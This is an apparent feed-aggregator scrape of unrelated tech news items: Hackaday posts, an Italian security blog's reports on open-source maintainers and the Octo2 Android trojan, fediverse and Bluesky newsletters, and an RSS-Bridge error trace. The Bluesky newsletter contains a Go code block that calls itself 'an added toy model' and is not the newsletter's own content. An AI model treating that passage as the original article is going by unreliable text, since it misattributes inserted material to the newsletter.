


Reviving a 15-Year Old Asus eeePC With Modern MX Linux


Welcome back to 2010 and the Asus eeePC Netbook, Seashell series. (Credit: Igor Ljubuncic)
It’s often said these days that computers don’t become outdated nearly as quickly as they did in the past, with even a decade-old computer still more than capable of handling daily tasks for the average person. Testing that theory, [Igor Ljubuncic] revisited the Asus eeePC which he purchased back in 2010. Although it’s not specified exactly which model it is, it features an Intel Atom N450 (1 core, 2 threads) running at 1.67 GHz, 1 GB of 667 MHz DDR2 and a 250 GB HDD, all falling into that ultra-portable, 10.1″ Netbook category.

When new, the netbook came with Windows 7 Starter Edition, which [Igor] replaced with Ubuntu Netbook Remix 10.04, which was its own adventure, but the netbook worked well and got dragged around the world on work and leisure assignments. With increasingly bloated updates, Ubuntu got replaced by MX Linux 18, which improved matters, but with the little CPU struggling more and more, [Igor] retired the netbook in 2019. That is, until reviving it recently.

Upon booting, the CMOS battery was of course empty, but the system happily continued booting into MX Linux. The Debian update repositories were of course gone, but pointing them at the archive versions allowed for some (very old) updates. This raised the question of whether modern Linux would even run on this ancient Atom CPU, and the answer turned out to be a resounding ‘yes’, as MX Linux still offers 32-bit builds of its most recent releases. After a 15-minute upgrade process and a 2-minute boot, the system was running a Linux 6.1 kernel with the Xfce desktop.

As for the performance, it’s roughly what you would expect, with video playback topping out at 480p (on the 1024×600 display) and applications like Firefox lacking the compact density mode, wasting a lot of screen space. Amazingly, the original battery still seems to deliver about half the runtime it did when new. All of which is to say that yes, even a ‘low-end’ 2010-era netbook can still be a very usable system in 2024, with a modern OS.


hackaday.com/2024/09/25/revivi…



Crisis in the Open Source world. 60% of maintainers are at risk of being lost


Tidelift, a company specialising in the support and maintenance of open source software, has published the report “2024 State of the Open Source Maintainer”. The study is based on a survey of 437 maintainers of Open Source projects and reveals a series of problems and trends in this area.

According to the report, 12% of respondents receive most of their income from Open Source projects. Developers who do maintainer work as an unpaid hobby account for 60%, of whom 44% would like to receive monetary compensation for their contribution. Compared with last year, the distribution of answers has remained almost unchanged.

Maintainers who are paid for their work devote much more time to developing their projects. Among paid “professional” maintainers, 82% devote more than 20 hours a week to development. Among the “amateurs”, only 8% of respondents can afford such a workload.

“Professional” maintainers noted that funding has allowed them to work on requests for new features (64%), investigate and fix bugs and security problems (52%) and recruit other maintainers (26%).

Over the last three years there has been a significant shift in the share of time devoted to security matters. Where in 2021 maintainers spent 4% of their time on security, the figure has now reached 11%. At the same time, paid maintainers devote 13% of their time to security versus 10% for their unpaid colleagues.

The study found that 60% of maintainers have considered abandoning their project and 22% have already done so. Among the main reasons for dissatisfaction with their role in the project, respondents cited: insufficient or missing payment (50%), feeling undervalued (48%), additional stress (43%) and inflated user expectations (39%).

The report also shows a change in the age structure of the maintainer community. Over the last three years, the share of developers aged 46 to 55 or 56 to 65 has doubled. At the same time, the share of maintainers under 26 has fallen from 25% in 2021 to 10% this year.

Interestingly, 45% of respondents have been Open Source maintainers for more than 10 years.

The article “Crisis in the Open Source world. 60% of maintainers are at risk of being lost” comes from il blog della sicurezza informatica.



And there it goes, the LinkedIn account is closed too!

I had it for quite a few years, I looked after it, I used it to look for work....
It never got me a damn thing!

The launch of a new privacy policy is as good an occasion as any to say goodbye and leave.

#LinkedIn #Social



FLOSS Weekly Episode 802: Emba – Layers Upon Layers of Bash



This week Jonathan Bennett and Randal Schwartz chat with Michael and Benedikt about Emba, the embedded firmware analyzer that finds CVEs and includes the kitchen sink! It does virtualization, binary analysis including version detection, and more. Check it out!


youtube.com/embed/LycT0T4SUfM?…

Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.

play.libsyn.com/embed/episode/…

Direct Download in DRM-free MP3.

If you’d rather read along, here’s the transcript for this week’s episode.

Places to follow the FLOSS Weekly Podcast:


hackaday.com/2024/09/25/floss-…



Swiss government Mastodon server shuts down, the Social Web Foundation launches among controversy and much more.


Last Week in Fediverse – ep 85

It’s been an eventful week in the fediverse, with the Swiss government ending their Mastodon pilot, the launch of the Social Web Foundation, Interaction Policies with GoToSocial and more!

Swiss Government’s Mastodon instance will shut down


The Swiss Government will shut down their Mastodon server at the end of the month. The Mastodon server was launched in September 2023 as a pilot that lasted one year. In the original announcement last year, the Swiss government focused on Mastodon’s benefits regarding data protection and autonomy. Now that the pilot has run for the year, the government has decided not to continue. The main reason they give is low engagement, stating that the 6 government accounts had around 3500 followers combined, and that the contributions also had low engagement rates. The government also cites the falling number of active Mastodon users worldwide as a contributing factor. When the Mastodon pilot launched in September 2023, Mastodon had around 1.7M monthly active users, a number that has dropped a year later to around 1.1M.

The Social Web Foundation has launched


The Social Web Foundation (SWF) is a new foundation managed by Evan Prodromou, with the goal of growing the fediverse into a healthy, financially viable and multi-polar place. The foundation launches with the support of quite a few organisations. Some are fediverse-native organisations such as Mastodon, but Meta, Automattic and Medium are also part of the organisations that support the SWF. The Ford Foundation also supports the SWF with a large grant, and in total the organisation has close to 1 million USD in funding.

The SWF lists four projects that they’ll be working on for now:

  • Adding end-to-end encryption to ActivityPub, a project that Evan Prodromou and Tom Coates (another member of the SWF) recently got a grant for.
  • Creating and maintaining a fediverse starter page. There are quite a variety of fediverse starter pages around already, but not all are well maintained.
  • A technical analysis and report on compatibility between ActivityPub and GDPR.
  • Working on long-form text in the fediverse.

The SWF is explicit in how they define two terms that have had a long and varied history: they state that the ‘fediverse’ is equivalent to the ‘Social Web’, and that the fediverse consists only of platforms that use ActivityPub. Both of these statements are controversial, to put it mildly, and I recommend this article for an extensive overview of the variety of ways the term ‘fediverse’ is used by different groups of people, all with different ideas of what this network actually is and what is a part of it. The explicit exclusion and rejection of Bluesky and the AT Protocol as not the correct protocol is especially noteworthy.

Another part of the SWF’s announcement that stands out is the inclusion of Meta as one of the supporting organisations. Meta’s arrival in the fediverse with Threads has been highly controversial since it was announced over a year ago, and one of the continuing worries that many people express is that of an ‘Embrace-Extend-Extinguish’ strategy by Meta. As the SWF will become a W3C member, and will likely continue to be active in the W3C groups, Meta being a supporter of the SWF will likely not diminish these worries.

As the SWF is an organisation with a goal of evangelising and growing the fediverse, it is worth pointing out that the reaction from a significant group within the fediverse developer community is decidedly mixed, with the presence of Meta, and arguments about the exclusive claim on the terms Social Web and fediverse being the main reasons. And as the goal of the SWF is to evangelise and grow the fediverse, can it afford to lose potential growth that comes from the support and outreach of the current fediverse developers?

Software updates


There are quite some interesting fediverse software updates this week that are worth pointing out:

GoToSocial’s v0.17 release brings the software to a beta state, with a large number of new features added. The main standout feature is Interaction Policies, with GoToSocial explaining: “Interaction policies let you determine who can reply to, like, or boost your statuses. You can accept or reject interactions as you wish; accepted replies will be added to your replies collection, and unwanted replies will be dropped.”

Interaction Policies are a highly important safety feature, especially the ability to turn off replies, as game engine Godot found out this week. It is a part where Mastodon lags behind other projects, on the basis that it is very difficult in ActivityPub to fully prevent the ability for other people to reply to a post. GoToSocial takes a more practical route by telling other software what their interaction policy is for that specific post, and if a reply does not meet the policy, it is simply dropped.

  • The PeerTube 6.3 release brings the ability to separate video streams from audio streams. This now allows people to use PeerTube as an audio streaming platform as well as a video streaming platform.
  • The latest update for NodeBB signals that the ActivityPub integration for the forum software is now ready for beta testing.
  • Ghost’s latest update now has fully working bi-directional federation, and they state that a private beta is now weeks away.


In Other News


IFTAS has started with a staged rollout of their Content Classification Service. With the opt-in service, a server can let IFTAS check all incoming image hashes for CSAM, with IFTAS handling the required (for US-based servers) reporting to NCMEC. IFTAS reports that over 50 servers already have signed up to participate with the service. CSAM remains a significant problem on decentralised social networks, something that is difficult to deal with for (volunteer) admins. IFTAS’ service makes this significantly easier while helping admins to execute their legal responsibilities. Emelia Smith also demoed the CCS during last week’s FediForum.

The Links


That’s all for this week, thanks for reading!

#fediverse

fediversereport.com/last-week-…




See https://curl.haxx.se/libcurl/c/libcurl-errors.html for description of the curl error code.

Details


Type: HttpException
Code: 0
Message: cURL error Resolving timed out after 15000 milliseconds: 28 (curl.haxx.se/libcurl/c/libcurl…) for https://t.me/s/FreeAssangeItalia
File: lib/http.php
Line: 154

Trace

#0 index.php(72): RssBridge->main()
#1 lib/RssBridge.php(103): DisplayAction->execute()
#2 actions/DisplayAction.php(68): DisplayAction->createResponse()
#3 actions/DisplayAction.php(117): TelegramBridge->collectData()
#4 bridges/TelegramBridge.php(39): getSimpleHTMLDOM()
#5 lib/contents.php(162): getContents()
#6 lib/contents.php(83): CurlHttpClient->request()
#7 lib/http.php(154)

Context


Query: action=display&bridge=Telegram&username=FreeAssangeItalia&format=Atom
Version: 2024-02-02
OS: Linux
PHP: 8.2.23




Updates regarding T&S on Bluesky, managed PDS hosting, and a deeper dive into the Jetstream


Last Week in the ATmosphere – Sept 24 week 3

Welcome to this week’s update, with lots of news regarding T&S on Bluesky, managed PDS hosting, and a deeper dive into the Jetstream!

The News


Bluesky released an update on their current efforts on Trust and Safety, listing all the features the team is currently working on. There are quite a few features being worked on that are great (better ban evasion detection, moderation feedback via app), and I want to highlight two of them:

  • Geography-specific labels. Bluesky is working to add the ability to remove posts only in certain countries, if they violate local laws but are allowed by Bluesky’s own guidelines. This is a feature that I’ll certainly be writing more about once more becomes known about it, as it poses tons of interesting questions about decentralised protocols and national internet sovereignty. As Bluesky’s own labels can be avoided in an open protocol by running your own infrastructure, it raises the questions of whether people actually do this to circumvent local laws, as well as the extent to which local governments will accept this (or understand it, to be honest).
  • With toxicity detection experiments, Bluesky aims to detect rude replies and potentially reduce their visibility, possibly by hiding them behind a ‘show more comments’ button. It puts Bluesky closer to what other networks are doing, which is hiding bad or spammy comments behind a button you have to click to see. My guess is that Bluesky also eventually will end up in this position, skipping the labeling part altogether.

A report by Brazilian investigative researchers finds that Bluesky is having difficulty moderating CSAM in Portuguese, mapping 125 accounts that sell or share CSAM. Bluesky’s head of Trust & Safety already reported in early September that the sudden inflow of new users led to a 10x increase in reported CSAM, as well as a more general strain on moderation. Bluesky’s Emily Liu also stated in response to the report: “we’re taking this extremely seriously, and since the recent influx of users started, we’ve hired more human moderators (who are also provided mental health services) + implementing additional tooling that can quash these networks faster and more effectively”.

Bluesky has appointed a legal representative in Brazil, and will make an official announcement in the next few days. X not having a legal representative in Brazil is what ultimately led to a ban on X in Brazil. This week, X finally caved and appointed a representative, and X might become unbanned in the next few days again. It is worth watching how X becoming available again in Brazil will impact the current userbase of Brazilians on Bluesky. While some will undoubtedly go back to using X, the open question is how large this group will be.

In other news


As the ecosystem matures, companies are starting to offer managed hosting of a PDS, both in the US and in Japan. It also raises interesting questions regarding branding and marketing: both of these services explicitly advertise themselves as offering a Bluesky PDS. While that makes sense from the company’s perspective (very few people will understand what an atproto PDS is), I am entirely unclear whether this is desirable from the perspective of the Bluesky company.

Last week I wrote about a directory of Brazilian Bluesky accounts, and it turns out there is also a Japanese equivalent: the Bluesky Feeds Navigator lists a large variety of custom feeds (mainly in Japanese) for Bluesky.

Brazilian tech YouTuber Gabs Ferreira interviewed Bluesky engineer hailey about developing on Bluesky, focusing specifically on mobile and React Native (in English). Ferreira interviewed Bluesky CTO Paul Frazee last week, and will talk with Dan Abramov on 26-09.

Altmetric, which tracks engagement with academic research, is working on adding support for Bluesky.

EmbedSky is a new tool to ’embed the last thirty posts and reposts from your BlueSky timeline in your blog or website’. It works with OAuth, which facilitates that the tool can only be used to embed posts from your own account.

On Relays, Jetstreams and costs


Some semi-technical protocol discussion about relays is worth mentioning, since I see people on the other networks talk about it. First, a super simplified description of how atproto works: everyone’s data is stored in a simple database called a PDS, which does little else besides storing your data. A Relay scrapes all the PDSs on the entire network and turns them into an unending stream of updates, often colloquially called a firehose. An AppView takes all the data from the firehose and makes it presentable for a user (counting all the ‘likes’ on a post, for example).

People on other networks often assume that running a Relay is prohibitively expensive, and it turns out it is not: Bluesky engineer Bryan Newbold ran an extra full-network Relay for 150 USD/month, and recently someone confirmed this is still possible after the massive influx of new users.

Relays can be ‘expensive’ in another way though: a lot of the data that goes through a Relay is dedicated to making sure that the data is authenticated. This is the ‘Authenticated’ part in the name ‘Authenticated Transfer Protocol’. However, there are quite a few use cases for which it is not necessary to validate every single event that comes through the firehose, such as a simple bot that listens for certain keywords. In that case, they can get by with a simpler version of the firehose.

Two versions of such a simpler firehose, called a Jetstream, launched this week. Bluesky engineer Jaz released their own version of a Jetstream, accompanied by an extensive blog post in which they describe how it works. They note that this reduces traffic by 99%, all while running on a $5/month VPS. Jaz also says that an official Bluesky version of a Jetstream is coming soon.

Skyware (who recently released a lightweight labeler as well) also has their own version of a Jetstream available.
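To make the Relay/Jetstream trade-off concrete, here is an added toy model of the pipeline described above; it is not Bluesky’s or Jaz’s code, and the commit shape, the P-256 key handling and the function names are assumptions. The PDS signs each update, the Relay verifies the signature before forwarding, and the Jetstream strips the signature so a keyword bot can consume the stream without doing any verification itself.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"fmt"
	"strings"
)

// Commit is an assumed, simplified shape for one update a PDS emits on the firehose.
type Commit struct {
	Repo string `json:"repo"`
	Seq  int    `json:"seq"`
	Text string `json:"text"`
	Sig  []byte `json:"sig"`
}

// JetstreamEvent is the stripped form handed to consumers: same content, no signature.
type JetstreamEvent struct {
	Repo string `json:"repo"`
	Text string `json:"text"`
}

// commitDigest binds repo, seq and text so changing any of them breaks the signature.
func commitDigest(c Commit) []byte {
	sum := sha256.Sum256([]byte(fmt.Sprintf("%s\x00%d\x00%s", c.Repo, c.Seq, c.Text)))
	return sum[:]
}

// PDS holds one repo's signing key (hypothetical key management, kept in memory).
type PDS struct {
	Repo string
	key  *ecdsa.PrivateKey
	seq  int
}

func NewPDS(repo string) (*PDS, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	return &PDS{Repo: repo, key: key}, nil
}

func (p *PDS) PublicKey() *ecdsa.PublicKey { return &p.key.PublicKey }

// Post creates the next commit for this repo and signs it.
func (p *PDS) Post(text string) (Commit, error) {
	p.seq++
	c := Commit{Repo: p.Repo, Seq: p.seq, Text: text}
	sig, err := ecdsa.SignASN1(rand.Reader, p.key, commitDigest(c))
	if err != nil {
		return Commit{}, err
	}
	c.Sig = sig
	return c, nil
}

// Relay knows each repo's public key and drops anything that does not verify.
type Relay struct {
	Keys map[string]*ecdsa.PublicKey
}

func (r *Relay) Ingest(c Commit) (Commit, bool) {
	pub, known := r.Keys[c.Repo]
	if !known || !ecdsa.VerifyASN1(pub, commitDigest(c), c.Sig) {
		return Commit{}, false
	}
	return c, true
}

// ToJetstream removes the signature: the consumer trusts the Relay's verification,
// which is exactly the trade-off a keyword bot is happy to make.
func ToJetstream(c Commit) JetstreamEvent {
	return JetstreamEvent{Repo: c.Repo, Text: c.Text}
}

// KeywordBot is the "simple bot that listens for certain keywords" use case.
func KeywordBot(events []JetstreamEvent, keyword string) []string {
	var hits []string
	for _, e := range events {
		if strings.Contains(strings.ToLower(e.Text), strings.ToLower(keyword)) {
			hits = append(hits, e.Repo+": "+e.Text)
		}
	}
	return hits
}

// WireBytes compares JSON sizes of the full commit and its Jetstream form. Only the
// signature is saved here; real firehose events also carry repo block data, which is
// where most of the reduction reported in the newsletter comes from.
func WireBytes(c Commit) (full int, slim int) {
	f, _ := json.Marshal(c)
	s, _ := json.Marshal(ToJetstream(c))
	return len(f), len(s)
}

func main() {
	pds, _ := NewPDS("did:plc:example") // constructed repo identifier
	relay := &Relay{Keys: map[string]*ecdsa.PublicKey{pds.Repo: pds.PublicKey()}}
	c, _ := pds.Post("anyone running a Relay at home?")
	if fwd, ok := relay.Ingest(c); ok {
		full, slim := WireBytes(fwd)
		fmt.Println(KeywordBot([]JetstreamEvent{ToJetstream(fwd)}, "relay"), full, slim)
	}
}
```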

The Links


That’s all for this week, thanks for reading! You can subscribe to my newsletter to receive the weekly updates directly in your inbox below, and follow me on Bluesky @laurenshof.online.

#bluesky

fediversereport.com/last-week-…





2024 Hackaday Superconference Speakers, Round Two



It’s honestly amazing the range of fascinating talks we have lined up for this year’s Supercon. From art robots that burp and belch to gliders returning from near-space, from hardcore DSP to DIY PCBs, and sketching with machines, Hackaday’s Supercon is like nothing else out there.

And if you’re already coming, don’t have a talk slot reserved, but still have something you want to say, please sign yourself up for a Lightning Talk! In the spirit of the Lightning, we’ll be taking submissions up to the absolute last minute, and we will fit in as many short talks as possible, but when it does fill up, we’ll be giving priority to those who got in first.

We’ve got one more speaker announcement coming up, and of course our keynote speaker and the badge reveal. Supercon will sell out, so get your tickets now before it’s too late. So without further ado, here is our next round of stellar speakers!


Katherine Connell
Sprite Lights: LED Body Art

Sprite Lights are 1.5 mm thick LED body art; think of a light-up temporary tattoo. Join Katherine “Smalls” Connell to hear about the 6-year journey to create the impossible as a self-taught maker. From hundreds of rapid prototypes, and smelting metal in her driveway to reflowing home-made flexible circuits on a griddle, Sprite Lights is a testament that when you’re willing to try anything, you can create everything.


James Rowley
Using an Oscilloscope to Peek Below the Noise Floor

In this talk, we will explore the DSP magic that allows lock-in amplifiers to detect signals hidden below the noise floor. By making a change to the measurement setup, these devices can isolate and measure faint signals amidst noise a hundred dB higher. Lock-in amplifiers are used in various applications, from sensitive photonics research to next-generation battery research and quantum computing.
We’ll also show you how to use your oscilloscope as a lock-in amplifier, enabling a low-cost entry point to these niche instruments.


Nanik Adnani
A Hacker’s Guide to Analog Design in a Digital World

When someone says analog design – what do you think of? If I had to guess I would say you don’t associate it with modern technology. And yet – analog circuits and the designers that build them play a critical role in every modern electronic device, especially the digital ones. In this talk I will provide an overview of the incredible analog circuits in our pockets, and often already in our projects. Once you’re convinced – I’ll show that analog design isn’t as hard as you think and how a few simple concepts can significantly improve your next project, while providing examples with some of mine.


Justin McAllister and Nick Foster
Finding Beamo – from interference to numbers stations, how to track down radio transmissions

In a world increasingly reliant on wireless communication, the ability to track down and understand the sources of radio transmissions has never been more critical. From identifying interference in urban environments to the enigmatic world of numbers stations, “Finding Beamo” will take the audience on a journey through the fascinating and often mysterious world of locating radio transmissions.


Randy Glenn
Yes, you CAN use the Controller Area Network outside of cars

The Controller Area Network (CAN) is used in cars, trains, buses, planes, and spacecraft – but it’s useful for all sorts of cases where systems need to communicate. I’ll talk about how you can use this technology to transfer data between microcontrollers and larger computers, and will present an example application that you can use as a starting point.


Yohan Hadji
Ultralight Glider Returns Home from the Stratosphere

This talk will give you an overview of all the technical challenges to solve to get a sub-250g UAV to autonomously return to home after releasing from a stratospheric balloon at 100,000 ft altitude.


Zach Fredin
The Circuit Graver

We all must strive to minimize iteration time. Designing and testing an idea in a single sitting spawns great things! It’s why we visit fab labs and love laser cutters and push the 3D printers in the corners of our apartments to the absolute limit. But circuit tools haven’t kept up; once you’re done mashing together breakout boards, your choices of milling, conductive-pasting, or home etching all leave a bit to be desired; they’re often messy, delicate, and lack the precision to reach the funnest parts in the catalog. Ugh, I need to go smaller than SOICs, and I don’t want to wait a week for commercial boards!

Here, I present and freely share significant progress on a novel method I’ve been poking at over the last few years which demonstrates the feasibility of fabricating 4/4 PCBs at home!


Priyanka Makin
Tech to Hack Embodiment

Tech constantly takes us out of the present moment and beckons us into the internet wormhole, but can we use technology to explore our emotions and root us in the now or even our physical bodies? At supercon, I would love to talk about my Body of Work series and how I used technology to interrogate my own embodiment.

My Body of Work is a series of tech-powered body part sculptures that relate to my own relationship with my body and come together to make an unconventional self-portrait. I’d like to start my talk with a bit of my research on the origins of artificial life, what embodiment is, and why acknowledging our bodies is important.


Blair Subbaraman
Sketching with Machines

Artists, craftspeople, and scientists are highly skilled makers. Yet, software for making physical things often overlooks existing skill sets, forcing practitioners to work against built-in assumptions to accomplish their goals. Using examples from digital art, ceramics, and plant biology, this talk will consider how creative practices can guide the development of digital fabrication systems and communities.


Eduardo Contreras
“Cats Turned Plumbers: Embedded Linux Adventures”

A bit of our journey deploying embedded Linux systems, and integrating drivers on the Linux kernels, from the hardware, to the kernel.

[If you read this far, you probably want tickets. Just sayin’.]


hackaday.com/2024/09/25/2024-h…





Deepfake, a disinformation risk for one Italian in two. The Ipsos survey


@Informatica (Italy e non Italy 😁)
The Ipsos survey on the deepfake phenomenon, between awareness and concern. 46% of Italians believe that artificial intelligence greatly increases the risk of disinformation, according to a new Ipsos survey titled “Deepfake: consapevolezza e



Copper Bling Keeps Camera Chill



Every action camera these days seems prone to overheating and sudden shutdowns after mere minutes of continuous operation. It can be a real pain, especially when the only heat problem a photographer might face back in the day was fogged film from storing a camera in a hot car. Then again, the things a digital camera can do while it’s not overheated are pretty amazing compared to analog cameras. Win some, lose some, right?

Maybe not. [Zachary Tong], having recently acquired an Insta360 digital camera, went to extremes to solve its overheating problem with this slick external heat sink project. The camera sports two image sensor assemblies back-to-back with fisheye lenses, allowing it to capture 360° images, but at the cost of rapidly overheating. [Zach]’s teardown revealed a pretty sophisticated thermal design that at least attempts to deal with the excess heat, including an aluminum heat spreader built into the case, which would be the target of the mod.

He attached a custom copper heatsink to a section of the heat spreader, which had been carefully milled flat to provide the best thermal contact. [Zach] used a fancy boron nitride heat transfer paste and attached the heat sink to the spreader with epoxy. A separate aluminum enclosure was bonded to the copper heat sink, giving [Zach] a place to mount his audio sync and timecode recorder and providing extra thermal mass.

Does it help? It sure seems to; where [Zach] was previously getting about twenty minutes before thermal shutdown with both cameras running, the heatsink-adorned rig was able to run about six times longer, with the battery giving out first. True, the heatsink takes away from the original sleek lines of the camera and might make it tough to use while snowboarding or surfing, but it’s still more portable than some external camera heatsinks we’ve seen. And besides, the copper is pretty gorgeous.

youtube.com/embed/IpzBdVeJ_jo?…


hackaday.com/2024/09/25/copper…






Telegram says it will now provide user data to the police; the walls are closing in on the Snowflake hacker; and why Nintendo's lawsuit against Palworld is bad (and Nintendo will probably win).

#Podcast



Tech in Plain Sight: Zipper Bags



You probably think of them as “Ziploc” bags, but, technically, the generic term is zipper bag. Everything from electronic components to coffee beans arrive in them. But they weren’t always everywhere, and it took a while for them to find their niche.
Image from an early Madsen patent
A Dane named Borge Madsen was actually trying to create a new kind of zipper for clothes in the 1950s and had several patents on the technology. The Madsen zipper consisted of two interlocking pieces of plastic and a tab to press them together. Unfortunately, they didn’t work very well for clothing.

A Romanian immigrant named Max Ausnit bought the rights to the patent and formed Flexigrip Inc. He used the zippers on flat vinyl pencil cases and similar items. However, these still had the little plastic tab that operated like a zipper pull. While you occasionally see these in certain applications, they aren’t what you think of when you think of zipper bags.

Zipping


Ausnit’s son, Steven, figured out how to remove the tab. That made the bags more robust, a little handier to use, and it also rendered them less expensive to produce. Even so, cost was a barrier because the way they were made was to heat seal the zipper portion to the bags.

That changed in the 1960s when the Ausnits learned of a Japanese company, Seisan Nippon Sha, that had a process to integrate the bags and zippers in one step which slashed the production cost in half. Flexigrip acquired the rights in the United States and created a new company, Minigrip, to promote this type of bag.

Enter Dow


In 1964, Dow Chemical wanted to acquire the rights to the Minigrip bags to sell in supermarkets using Dow’s polyethylene bags. And with this marriage, the Ziploc bag as we know it was born.

Dow continued driving down the cost, tasking R. Douglas Behr to improve how the Ziploc production line worked. Eventually, the bags were flying off the line at 150 feet per minute.

You can find plenty of videos of machines that “make” zipper bags on YouTube (like the one below). Many of them are surprisingly light on detail, and it isn’t clear how many of them are molding zippers and how many are sealing premade zippers to bags or using rolls of bags with zippers already in them. However, the video below shows making “zip lines” from pellets and then creating bags from film. This creates giant rolls of zipper bag stock which are then cut into individual bags.

youtube.com/embed/ivPZQNOEDWo?…

Slow Start


At first, consumers weren’t sure what to do with the zipper bags. Supposedly, a record company was set to put records in the bags but when an executive handed one to his assistant, the assistant ripped the bag open without using the zipper.

Regardless, consumers finally figured it out. Now, the zipper bag is a staple in electronics, food storage, and many other areas, too.

More Than Meets the Eye


Even the most ordinary things have details you don’t think about, but someone does. For example, zip bags can have one, two, or three zippers. Some have color indicators that show the seal. Some have strips that conceal the zipper so you can tell if the bag was opened.

There are special zippers for liquids and different ones that resist getting powder stuck in the seal. Some zip bags still have pulls, and some of those pulls are child-proof, requiring the user to pinch the tab to slide it. You can even get zipper bags that don’t use locking zippers but hook-and-loop closures.

Even though zipper bags don’t seem very glamorous, you can learn a lot from the Ausnits. Improve your product in ways that make people want to use it. Also, improve your product in ways that lower costs. We’d guess that when Ausnit bought the zipper patents, he’d never imagine how the market would grow.

You can see a talk from Steve Ausnit at Marquette University in the video below. If you’ve ever had the urge to be an entrepreneur, you can learn a lot from his talk.

youtube.com/embed/abSGq9cE6G8?…


hackaday.com/2024/09/25/tech-i…



Octo2: The Trojan targeting Android users lands in Europe


A new variant of the Android malware called Octo2, an improved version of Octo (ExobotCompact), is spreading in Europe. According to ThreatFabric’s experts, the new version could have a significant impact on the cybersecurity landscape.

Octo2 is an update of a malware family popular among cybercriminals, distributed under the Malware-as-a-Service (MaaS) model. This version offers improved remote control of victims’ devices and new concealment methods, including domain name generation (DGA), which lets it bypass security mechanisms and avoid detection.

The Exobot family was first spotted in 2016 as a banking trojan capable of performing interface overlay attacks and intercepting calls and messages. A lightweight version, ExobotCompact, appeared in 2019, and by 2021 its improved variant called Octo. It was this version that became the basis for further modifications.

In 2022, cybercriminals actively discussed Octo on underground forums. Since then the malware’s activity has only increased, and it soon began to be used in several regions of the world, including Europe, the United States and Asia.

The main change in 2024 is due to the leak of Octo’s source code, which led to several forks of the program. However, the biggest threat is the original Octo2, developed by Octo’s creator and distributed to those who previously used the first version.

Octo2 has received significant updates, including improvements to the stability of remote device management and methods for evading detection and analysis systems. Octo2 also has a mechanism for intercepting push notifications on victims’ devices and hiding them, thus depriving users of important alerts. This poses a threat to many mobile applications, since attackers can easily redirect data and carry out fraudulent activities.

The first Octo2 campaigns have already been recorded in countries such as Italy, Poland, Moldova and Hungary. The malware masquerades as popular applications such as Google Chrome and NordVPN, allowing it to slip onto users’ devices unnoticed.

In the campaigns detected, the Zombinder service acts as the first installation stage: after launch, Zombinder requests the installation of an additional “plugin”, which is in fact Octo2, thereby successfully bypassing the restrictions of Android 13+.

Zombinder requests permission to install a “required plug-in” in the form of the Octo2 trojan

One of the key elements of Octo2 is the integration of a new domain name generation method (Domain Generation Algorithm, DGA), which allows the malware to dynamically change its command-and-control (C2) servers. This makes things difficult for researchers and antivirus companies, because new domains are created automatically, making them harder to block.

In addition, Octo2 uses a new encryption scheme for the data transmitted to the control servers, with a dynamic key for each request, which improves protection against analysis and detection.

Given its improved remote access and stealth capabilities, Octo2 represents a serious threat to mobile users, particularly those who use banking applications. The program is able to silently perform fraudulent operations directly on the victim’s device, which makes it one of the most dangerous mobile trojans.

The article Octo2: The Trojan targeting Android users lands in Europe comes from il blog della sicurezza informatica.



Deterrence drills. China tests an intercontinental missile in the Pacific

@Notizie dall'Italia e dal mondo

It had been over forty years since China last publicly announced a missile test, since 1980, when it successfully launched its first intercontinental missile, the DF-5, which travelled over 8,000 kilometres before falling



Orpheus Network tells users: "With great displeasure we need to inform you that a malicious actor has successfully carried out a massive peer scraping attack on our tracker."#Piracy #Torrenting #Torrents


Google accuses Microsoft of stifling cloud competition in fresh antitrust complaint


On Wednesday (25 September), Google filed an antitrust complaint with the EU Commission accusing Microsoft of unfair licensing practices in cloud computing contracts.


euractiv.com/section/competiti…



The reform of conduct and assessment in primary school has been definitively approved by the Chamber of Deputies.

All the details here ▶ miur.gov.



ITU CYBER SECURITY INDEX 2024


Italy is a model country for its cybersecurity posture. So says the ITU, the International Telecommunication Union, the United Nations agency specialising in ICT, which gives our country full marks (100/100) in the Global Cybersecurity Index 2024 report. With this publication, now in its fifth edition, the UN agency assesses the cybersecurity maturity level of more than 190 countries against 5 parameters: legal, technical, organisational, capacity development and cooperation. The ITU divides countries into groups: from the most virtuous (Tier 1) to those still building up (Tier 5). The first group, entered with a minimum score of 95/100, is made up of the 46 countries that have shown a strong commitment in the field, coordinating government activities with those of the private sector and demonstrating solidity in all five parameters.

Italy was therefore rated highly for its national legislation on cybersecurity and cybercrime, its technical capabilities such as the presence of a national CSIRT, the adoption of a national strategy and the presence of a specialised government agency (the ACN), incentives for development, and the improvement of skills and awareness. And, finally, for its collaboration at international level and with the private sector.

For the survey, each country completed a questionnaire through its point of contact, which for Italy is the Agenzia per la cybersicurezza nazionale. The data collected in this way were enriched and verified against independent sources. The 2024 report was produced by analysing 30,000 URLs and more than a thousand PDFs, the ITU says.

Despite the global improvement in cybersecurity posture, the ITU urges countries not to lower their guard. Among the persistent threats it flags: ransomware, cyberattacks that hit key industries and also cause service disruptions, and privacy violations affecting individuals and organisations.



dicorinto.it/agenzia-per-la-cy…



Italy’s national hacker team


Italy’s national team of cyberdefenders was presented today at a press conference. TeamItaly, as it is called, will take part in the European Cybersecurity Challenge in Turin from 7 to 11 October at the Grandi Officine Riparazioni.

The event, organised by ACN and the CINI National Cybersecurity Laboratory, will see the participation of 38 teams and two guest delegations as observers. ECSC 2024 is the seventh European competition in which Team Italy competes in attack-and-defence and “jeopardy” contests, that is, parallel challenges in which the individual teams tackle various security problems, from cryptography to web security.

The presentation was attended by the Rector of IMT Lucca, Prof. Rocco De Nicola, who hosted the conference at the university; the new director of the CINI National Cybersecurity Laboratory, Professor Alessandro Armando; the deputy head of the ACN’s Technological and Research Programmes and Projects Service, Dr Liviana Lotti; and the team’s coaches, Mario Polino and Emilio Coppa.



dicorinto.it/agenzia-per-la-cy…



Cyberpack Puts All the Radios Right on Your Back



A disclaimer: Not a single cable tie was harmed in the making of this backpack cyberdeck, and considering that we lost count of the number of USB cables [Bag-Builds] used to connect everything in it, that’s a minor miracle.

